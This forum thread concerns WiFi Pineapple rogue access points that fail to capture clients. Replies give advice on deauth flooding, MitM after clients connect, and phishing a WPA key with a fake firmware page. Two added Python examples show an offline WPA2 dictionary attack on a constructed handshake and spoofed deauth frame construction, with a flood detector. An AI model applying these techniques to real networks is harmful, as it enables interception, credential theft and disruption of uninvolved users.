Why does nobody have the answer for this?


nik321

So the other week I posted TWO threads about my Pineapple Nano and Tetra.

I have not received much information on the posts from anyone.

I am just wondering why nobody is able to give me an answer for the fact that neither of my devices is capturing clients?

I have watched the YouTube vid by Hak5 on "Going from prime to primeap" - where he shows you adding the MACs to the pool, also adding the SSID to the pool, enabling the daemon and every check box, and then deauthing everyone off the network...

The deauth DOES NOT WORK. And I am not receiving ANY clients?


28 minutes ago, nik321 said:

The deauth DOES NOT WORK. And I am not receiving ANY clients?

So there could be a number of reasons for this. Have you tried practicing at home first? Can you associate with the Pineapple manually? Try forgetting your encrypted home AP to avoid auto-connecting to it so you can test.

I would start by turning off auto-enable for PineAP if it's on, make sure all check boxes are clear on the PineAP page, save settings, then click the arrow at the top, and save settings for boot. Clear any SSIDs currently in the pool, and from filters. Reboot the Pineapple.

Then, once the Pineapple is rebooted, confirm it has internet connectivity, and then enable PineAP before checking any boxes. Once enabled, check off "Allow Associations", "Log Probes", and "Log Associations". Then click the Save button below. This should now allow associations for any probes for open WiFi, and respond to all of them. You will not get auto associations from WPA/WPA2 encrypted AP requests. Let me know if this works for you.


On 7/14/2017 at 4:36 PM, Decoy said:

You will not get auto associations from WPA/WPA2 encrypted AP requests.

Yes sir, practicing at home was my first initial test. But forgetting my home AP would delete the object? Nobody at work is going to click "forget" on their work's wifi, are they?
What you said at the end about not getting auto associations from WPA/WPA2 AP requests? Well doesn't this just defeat the object? Where I live, I rarely ever see wifi that isn't encrypted these days... especially office wifi.


With "Allow Associations" checked and continued deauthing I've been able to get specific targets to connect, but it does take some effort. And they won't always connect to the SSID I'm deauthing them from; usually it's another SSID they've probe requested and the Pineapple responded to.


Hey man, pretty new here, but hell, I thought I would give replying to this a shot... if anyone wants to correct what I am saying please go ahead, I am here to learn like everybody else.

The problem you are having starts with the way that encrypted wireless traffic works... first off you have two parties, they start an encrypted session by sharing with one another their "key", but hell, let's just make this simple... let's say names... son... and dad...

Now, son and dad trust one another... and they are able to share a secret code that mom doesn't understand. So every time son wants to talk to dad... he says "hey dad, this is son... is that you?" and dad says "hi son, this is dad"... thereafter they can talk without mom knowing what they are saying.

If the response was to be mom... or sister... or a stranger on the street... obviously son wouldn't say anything.

This is the VERY simplified reason that you can't kick someone off an encrypted wireless connection and get them to talk to yours instead...

THE RABBIT HOLE GOES DEEPER...

So... why can't we just call ourselves dad? Seems simple, right?? Well... in addition to dad saying he is dad... and son saying he is son... there is a secret that they both share... a secret word... this secret word is, of course, encrypted... but... it is possible to "sniff" the encrypted password and work out what it is by comparing a "dictionary" with its encrypted version of the word... it's going to take time, and brainpower, but it is possible.

That's pretty much the long and short of it... you have a starting point now, and hopefully an understanding of how it works... is it impossible using your Tetra to penetrate WPA2 networks... absolutely not. But it's a hell of a lot easier to intercept traffic on unencrypted (open) networks at $randomwifihotspot.

The reason nobody replied is because in the short time I have been here, I have seen this question pop up a LOT. And it basically comes down to handing someone with no experience a potentially devastating tool, and empowering them to learn why it's not working.

Good luck,

/adhoc

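The "secret word" in the post above is, concretely, the WPA2 passphrase, and the thing that gets sniffed is not the passphrase itself but the MIC on the 4-way handshake: a keyed hash that only a party holding the PMK derived from the passphrase can produce or verify. The example below is added here and is not code from the thread or from Hak5; it derives PMK, PTK and KCK the way 802.11i specifies, builds a minimal EAPOL-Key message 2, and then runs the dictionary attack the post describes against that captured frame. The SSID, MAC addresses, nonces and wordlist are constructed for the demonstration. It also shows the other direction of the "call ourselves dad" problem: a rogue AP that guesses the wrong passphrase cannot validate (or forge) a MIC, so the client never completes the handshake with it.

```python
import hashlib
import hmac
import struct

# Constructed handshake parameters (not captured from any real network).
SSID = "homenet"
AP_MAC = bytes.fromhex("021122334455")       # locally administered, made up
CLIENT_MAC = bytes.fromhex("02aabbccddee")   # made up
ANONCE = hashlib.sha256(b"anonce").digest()  # 32-byte deterministic stand-in for a random nonce
SNONCE = hashlib.sha256(b"snonce").digest()
MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields before the MIC


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenated HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    out = b""
    for counter in range(4):  # 4 * 20 bytes = 80 >= 64
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
    return out[:64]


def wpa2_kck(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes of the PTK: the Key Confirmation Key that keys the EAPOL MIC."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_key_frame(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP): RSN descriptor, key info 0x010a
    (HMAC-SHA1 MIC, pairwise, MIC bit set), replay counter 1, SNonce, no key data."""
    body = (bytes([2])                   # descriptor type: RSN
            + struct.pack(">H", 0x010A)  # key information
            + struct.pack(">H", 16)      # key length (CCMP)
            + struct.pack(">Q", 1)       # replay counter
            + snonce                     # 32-byte nonce
            + bytes(16)                  # key IV
            + bytes(8)                   # key RSC
            + bytes(8)                   # reserved
            + mic                        # 16-byte MIC, all zero while it is being computed
            + struct.pack(">H", 0))      # key data length
    return bytes([2, 3]) + struct.pack(">H", len(body)) + body  # 802.1X v2, type EAPOL-Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 MIC: HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def client_message2(passphrase: str, ssid: str, ap_mac: bytes, client_mac: bytes,
                    anonce: bytes, snonce: bytes) -> bytes:
    """The client's reply to ANonce: message 2 carrying a MIC only a passphrase holder can make."""
    kck = wpa2_kck(wpa2_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    return eapol_key_frame(snonce, eapol_mic(kck, eapol_key_frame(snonce)))


def mic_valid(passphrase: str, ssid: str, ap_mac: bytes, client_mac: bytes,
              anonce: bytes, frame: bytes) -> bool:
    """AP side (and attacker side): recompute the MIC for a passphrase and compare."""
    snonce = frame[17:49]  # SNonce follows descriptor type, key info, key length, replay counter
    kck = wpa2_kck(wpa2_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    return hmac.compare_digest(eapol_mic(kck, frame), frame[MIC_OFFSET:MIC_OFFSET + 16])


def dictionary_attack(wordlist, ssid, ap_mac, client_mac, anonce, frame):
    """Offline attack on a sniffed message 2: the first candidate whose MIC matches, else None.
    Each candidate costs one 4096-round PBKDF2, which is why this takes time."""
    for candidate in wordlist:
        if mic_valid(candidate, ssid, ap_mac, client_mac, anonce, frame):
            return candidate
    return None


if __name__ == "__main__":
    captured = client_message2("correct horse", SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    print("captured message 2:", captured.hex())
    print("rogue AP guessing 'password' validates the MIC?",
          mic_valid("password", SSID, AP_MAC, CLIENT_MAC, ANONCE, captured))
    print("dictionary result:",
          dictionary_attack(["password", "letmein", "correct horse"],
                            SSID, AP_MAC, CLIENT_MAC, ANONCE, captured))
```

The constant-time compare on the AP side is deliberate: a timing leak on the MIC check would be a bug, but it would not help the attacker here anyway, since the cost that matters is the 4096-round PBKDF2 per candidate. That per-guess cost, multiplied by the wordlist, is the "time and brainpower" the post refers to, and it is why a long random passphrase is out of reach while a dictionary word is not.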

Firstly, welcome here!! 

Secondly, this reply was awesome mate. Great read. I understand what you are saying and I understand the theory behind it now. It was a good example. From watching the Hak5 videos of Darren in his video labelled "Primer to PrimeAP" - I didn't realise that to accomplish that it had to be on an OPEN wifi... As I stated... how many wifis nowadays are NOT WPA2 encrypted?

But it makes perfect sense now.

Let's say... on someone's phone... they have their HOUSE wifi auto connect... So as soon as they get home, it auto connects to their home router, which is WPA2 encrypted... but of course it just auto connects because it's remembered... but let's say that same phone had JUST come back from Starbucks, which has an open wifi... and that phone has connected to Starbucks (so obviously that is ALSO saved in the phone).

If you set up the TETRA... would the TETRA pick up the signals for that Starbucks wifi? Because of course the phone has it saved already and will be sending out probe requests to find it... or would it only work IF I shut the home router off, meaning it couldn't actually connect to it? In other words, if a device is already connected to wifi... does it stop sending out probe requests for other saved wifis?

Depends on the device, on when and how often it sends out probes for other saved wifi. Newer devices normally don't send out probes when they are connected to a wifi with internet detected.

The other side is going to be signal strength. If you are providing a better signal than the one they are trying to connect to (i.e. you are between the device and the router they want to connect to) you'll have a better chance of them trying to connect to your device instead. This is all assuming they have a saved open wifi and want to try to connect.

There are other ways you can set up the Pineapples to fake encrypted wifi networks, but I haven't looked much into it myself. You can look around on the forum; there's at least one long thread I've seen that talks about this, but it's a much more advanced topic and will require a decent learning curve.


3 hours ago, nik321 said:

But I do know the network key? I am attempting this on my home router

Social engineering is a viable option. There's no way to spoof the 4-way handshake. Look at wifiphisher or fluxion for some examples. You could use the EvilPortal module to serve up a firmware update page and get the key that way; however, this would require deauthing the crap out of the actual wifi AP and hoping the user clicks on your open hosted version. Some people do...


11 hours ago, nik321 said:

But I do know the network key? I am attempting this on my home router

If that's the case, then set up the wifi on your Pineapple. Once it's working, you can deauth the legitimate AP, and the clients should hop to your AP. It's not an exact science though. Some clients will ignore the deauth packet. Not sure why though. Make sure you're sending the deauths from your legitimate AP's MAC address.


Hey nik321, thanks for starting this topic. I've got the exact same questions :)

Does anyone know if there is a tutorial out there that demonstrates how to perform a MitM attack with the pineapple on a WPA network if you have the key?


If you have the network key, then like I said before, set up the wifi like you would any other access point. Provide a louder signal than the real access point and deauth the shit out of the real AP. Once the client connects, run your MitM attacks.

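The last two replies hinge on one detail: the deauthentication frame has to carry the real AP's address as transmitter and BSSID, otherwise the client ignores it. The example below is added here and is not code from the thread, from Hak5 or from aireplay-ng; it builds that 26-byte 802.11 management frame by hand so the spoofed fields are visible, parses it back, and, since the same frames are what a defender sees, counts deauths per transmitter over a capture window to flag a flood. All MAC addresses and the capture window are constructed for the demonstration. Building the bytes is as far as it goes: actually transmitting them requires a monitor-mode interface with injection support, which is not shown.

```python
import struct
from collections import Counter

DEAUTH_FC = 0xC0            # frame control byte 0: type 0 (management), subtype 12 (deauth)
REASON_CLASS3_NONASSOC = 7  # "class 3 frame received from nonassociated STA", the usual choice
BROADCAST = "ff:ff:ff:ff:ff:ff"
HEADER_FMT = "<BBH6s6s6sH"  # FC, flags, duration, addr1, addr2, addr3, sequence control: 24 bytes


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(client: str, bssid: str, reason: int = REASON_CLASS3_NONASSOC, seq: int = 0) -> bytes:
    """802.11 deauthentication frame, FCS omitted (the driver appends it on injection).
    addr1 = receiver (the client, or broadcast), addr2 = transmitter, addr3 = BSSID.
    addr2 and addr3 both carry the real AP's address: that is the spoof that makes the
    client believe its own AP kicked it off."""
    header = struct.pack(HEADER_FMT, DEAUTH_FC, 0x00, 0,
                         mac_bytes(client), mac_bytes(bssid), mac_bytes(bssid), seq << 4)
    return header + struct.pack("<H", reason)


def parse_deauth(frame: bytes):
    """(receiver, transmitter, bssid, reason) for a deauth frame, None for anything else."""
    if len(frame) < 26:
        return None
    fc, _flags, _duration, a1, a2, a3, _seq = struct.unpack(HEADER_FMT, frame[:24])
    if fc != DEAUTH_FC:
        return None
    (reason,) = struct.unpack("<H", frame[24:26])
    return mac_str(a1), mac_str(a2), mac_str(a3), reason


def detect_deauth_flood(frames, threshold: int = 5) -> dict:
    """Defender side: count deauths per transmitter address in a capture window and return
    the addresses at or above the threshold. A real AP sends a handful of deauths at most;
    a burst of reason-7 frames in the AP's name is the attacker's signature."""
    per_transmitter = Counter()
    for frame in frames:
        parsed = parse_deauth(frame)
        if parsed is not None:
            per_transmitter[parsed[1]] += 1
    return {mac: n for mac, n in per_transmitter.items() if n >= threshold}


def constructed_capture() -> list:
    """Made-up capture window: 8 spoofed broadcast deauths in the victim AP's name,
    one ordinary deauth from a neighbouring AP, and one non-deauth management frame."""
    victim_ap = "02:11:22:33:44:55"  # constructed, locally administered address
    neighbour = "02:99:99:99:99:99"
    frames = [build_deauth(BROADCAST, victim_ap, seq=i) for i in range(8)]
    frames.append(build_deauth("02:aa:bb:cc:dd:ee", neighbour, reason=3))  # reason 3: STA is leaving
    frames.append(bytes([0x80, 0x00]) + bytes(24))  # beacon-shaped frame, skipped by the parser
    return frames


if __name__ == "__main__":
    frame = build_deauth("02:aa:bb:cc:dd:ee", "02:11:22:33:44:55")
    print("deauth frame:", frame.hex())
    print("parsed:", parse_deauth(frame))
    print("flood sources:", detect_deauth_flood(constructed_capture()))
```

Two things the frame makes obvious. First, nothing in it is authenticated, which is exactly why spoofing the AP's address works and why 802.11w (protected management frames) exists; a client and AP that negotiate it will drop these frames, which is one reason the reply above notes that some clients ignore the deauth. Second, because the transmitter address is the victim AP's own, a defender cannot attribute the flood by address alone; the rate and the reason code are the tell, which is what the detector keys on.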
